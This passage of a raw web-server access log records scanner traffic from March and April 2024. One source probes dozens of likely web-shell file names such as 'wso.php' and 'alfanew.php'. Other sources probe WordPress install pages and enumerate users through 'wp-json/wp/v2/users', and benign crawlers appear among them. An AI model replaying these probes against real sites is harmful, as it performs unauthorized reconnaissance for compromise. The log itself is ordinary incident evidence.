7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [25/Mar/2024:17:35:43 +0700] "GET /css.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [25/Mar/2024:17:35:48 +0700] "GET /wp-2019.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [25/Mar/2024:17:35:51 +0700] "GET /atomlib.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [25/Mar/2024:17:35:55 +0700] "GET /css.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [25/Mar/2024:17:36:00 +0700] "GET /simple.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [25/Mar/2024:17:36:05 +0700] "GET /log.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [25/Mar/2024:17:36:09 +0700] "GET /index.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [25/Mar/2024:17:36:15 +0700] "GET /mail.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [25/Mar/2024:17:36:18 +0700] "GET /lufix.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [25/Mar/2024:17:36:21 +0700] "GET /doc.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [25/Mar/2024:17:36:25 +0700] "GET /bak.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [25/Mar/2024:17:36:29 +0700] "GET /content.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [25/Mar/2024:17:36:31 +0700] "GET /upfile.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [25/Mar/2024:17:36:36 +0700] "GET /wp.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [25/Mar/2024:17:36:39 +0700] "GET /wp-conflg.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [25/Mar/2024:17:36:46 +0700] "GET /bypass.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [25/Mar/2024:17:36:52 +0700] "GET /wp-activate.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [25/Mar/2024:17:36:59 +0700] "GET /404.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [25/Mar/2024:17:37:06 +0700] "GET /updates.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [25/Mar/2024:17:37:16 +0700] "GET /radio.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [25/Mar/2024:17:37:27 +0700] "GET /plugins.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [25/Mar/2024:17:37:36 +0700] "GET /xmrlpc.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [25/Mar/2024:17:37:43 +0700] "GET /ae.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [25/Mar/2024:17:37:52 +0700] "GET /moon.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [25/Mar/2024:17:38:01 +0700] "GET /blog.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [25/Mar/2024:17:38:12 +0700] "GET /themes.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [25/Mar/2024:17:38:19 +0700] "GET /ini.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [25/Mar/2024:17:38:28 +0700] "GET /as.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [25/Mar/2024:17:38:49 +0700] "GET /shell.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [25/Mar/2024:17:39:00 +0700] "GET /ws.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [25/Mar/2024:17:39:11 +0700] "GET /dropdown.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [25/Mar/2024:17:39:19 +0700] "GET /makeasmtp.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [25/Mar/2024:17:39:26 +0700] "GET /wp-sigunq.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [25/Mar/2024:17:39:33 +0700] "GET /wso112233.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [25/Mar/2024:17:39:41 +0700] "GET /wp-atom.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [25/Mar/2024:17:39:49 +0700] "GET /alfanew.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [25/Mar/2024:17:39:57 +0700] "GET /fw.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [25/Mar/2024:17:40:06 +0700] "GET /install.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [25/Mar/2024:17:40:14 +0700] "GET /wp-login.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [25/Mar/2024:17:40:25 +0700] "GET /mini.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [25/Mar/2024:17:40:34 +0700] "GET /configs.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [25/Mar/2024:17:40:42 +0700] "GET /test.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [25/Mar/2024:17:40:49 +0700] "GET /classsmtps.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [25/Mar/2024:17:40:56 +0700] "GET /wp-hudbud.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [25/Mar/2024:17:41:04 +0700] "GET /inputs.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [25/Mar/2024:17:41:11 +0700] "GET /autoload_classmap.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [25/Mar/2024:17:41:19 +0700] "GET /text.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 3.135.227.36 - - [25/Mar/2024:21:48:21 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.4 Mobile/15E148 Safari/604.1" 64.23.202.194 - - [26/Mar/2024:02:08:22 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36" 128.199.186.152 - - [26/Mar/2024:23:36:55 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; FreeBSD amd64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36" 91.92.252.169 - - [27/Mar/2024:03:52:01 +0700] "GET /sample.php?pd=1&mapname=ova.html&a=vx000&dstr=@Ovatools HTTP/1.1" 301 162 "http://www.google.com" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 91.92.252.169 - - [27/Mar/2024:03:52:19 +0700] "GET /general.php?pd=1&mapname=ova.html&a=vx000&dstr=@Ovatools HTTP/1.1" 301 162 "http://www.google.com" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 83.147.52.37 - - [27/Mar/2024:14:30:15 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.75 Safari/537.36" 205.210.31.161 - - [28/Mar/2024:02:41:47 +0700] "GET / HTTP/1.1" 301 162 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com" 146.190.227.67 - - [29/Mar/2024:10:53:03 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36" 205.210.31.252 - - [29/Mar/2024:13:25:39 +0700] "GET / HTTP/1.1" 301 162 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com" 34.222.177.41 - - [30/Mar/2024:05:20:10 +0700] "GET //wp.lautnusantara.com/wp-content/plugins/woocommerce/assets/js/frontend/cart-fragments.min.js HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 11; IN2025) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36" 199.45.155.55 - - [30/Mar/2024:07:59:24 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" 198.235.24.139 - - [31/Mar/2024:17:46:23 +0700] "GET / HTTP/1.1" 301 162 "-" "-" 199.45.154.54 - - [01/Apr/2024:05:39:43 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" 54.217.190.89 - - [02/Apr/2024:02:56:11 +0700] "GET / HTTP/1.0" 301 162 "-" "Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)" 198.235.24.229 - - [02/Apr/2024:02:56:43 +0700] "GET / HTTP/1.1" 301 162 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com" 167.88.61.92 - - [04/Apr/2024:03:48:38 +0700] "GET /wp-admin/install.php?step=1 HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 167.88.61.92 - - [04/Apr/2024:03:48:41 +0700] "GET /wordpress/wp-admin/install.php?step=1 HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 167.88.61.92 - - [04/Apr/2024:03:48:42 +0700] "GET /wp-content/plugins/woocommerce-payments/dist/blocks-checkout.css HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 167.88.61.92 - - [04/Apr/2024:03:48:44 +0700] "GET /wp-content/plugins/royal-elementor-addons/assets/css/frontend.min.css HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 38.128.66.69 - - [04/Apr/2024:03:48:52 +0700] "GET /wp-admin/setup-config.php?step=1 HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 38.128.66.69 - - [04/Apr/2024:03:48:54 +0700] "GET /wordpress/wp-admin/setup-config.php?step=1 HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 38.128.66.69 - - [04/Apr/2024:03:48:56 +0700] "GET /old/wp-admin/setup-config.php?step=1 HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 38.128.66.69 - - [04/Apr/2024:03:48:58 +0700] "GET /OLD/wp-admin/setup-config.php?step=1 HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 38.128.66.69 - - [04/Apr/2024:03:49:00 +0700] "GET /wp-admin/install.php?step=1 HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 102.129.40.35 - - [05/Apr/2024:02:38:33 +0700] "GET /wp-login.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 102.129.40.35 - - [05/Apr/2024:02:38:41 +0700] "GET ///?author=1 HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 102.129.40.35 - - [05/Apr/2024:02:38:45 +0700] "GET ///wp-json/wp/v2/users/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 35.171.144.152 - - [05/Apr/2024:23:34:48 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 \x5C(Windows NT 10.0\x5C; Win64\x5C; x64\x5C) AppleWebKit/537.36 \x5C(KHTML, like Gecko\x5C) Chrome/100.0.4896.60 Safari/537.36" 205.210.31.41 - - [06/Apr/2024:17:49:10 +0700] "GET / HTTP/1.1" 301 162 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com" 162.0.213.193 - - [06/Apr/2024:23:13:11 +0700] "GET /wp-login.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 162.0.213.193 - - [06/Apr/2024:23:13:17 +0700] "GET ///?author=1 HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 162.0.213.193 - - [06/Apr/2024:23:13:21 +0700] "GET ///wp-json/wp/v2/users/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 162.142.125.214 - - [08/Apr/2024:11:00:28 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" 205.210.31.165 - - [09/Apr/2024:05:21:33 +0700] "GET / HTTP/1.1" 301 162 "-" "-" 91.92.252.169 - - [09/Apr/2024:08:18:10 +0700] "GET /repeater.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [09/Apr/2024:08:18:20 +0700] "GET /admin.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [09/Apr/2024:08:18:31 +0700] "GET /inc.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [09/Apr/2024:08:18:40 +0700] "GET /lv.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [09/Apr/2024:08:18:53 +0700] "GET /seo.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [09/Apr/2024:08:19:03 +0700] "GET /x.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [09/Apr/2024:08:19:12 +0700] "GET /b0x.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [09/Apr/2024:08:19:20 +0700] "GET /about.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [09/Apr/2024:08:19:28 +0700] "GET /cloud.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [09/Apr/2024:08:19:37 +0700] "GET /wso.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [09/Apr/2024:08:19:42 +0700] "GET /cong.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [09/Apr/2024:08:19:47 +0700] "GET /network.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [09/Apr/2024:08:19:54 +0700] "GET /css.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [09/Apr/2024:08:19:58 +0700] "GET /wp-2019.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [09/Apr/2024:08:20:01 +0700] "GET /atomlib.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [09/Apr/2024:08:20:05 +0700] "GET /css.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [09/Apr/2024:08:20:07 +0700] "GET /simple.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [09/Apr/2024:08:20:10 +0700] "GET /log.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [09/Apr/2024:08:20:17 +0700] "GET /index.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A 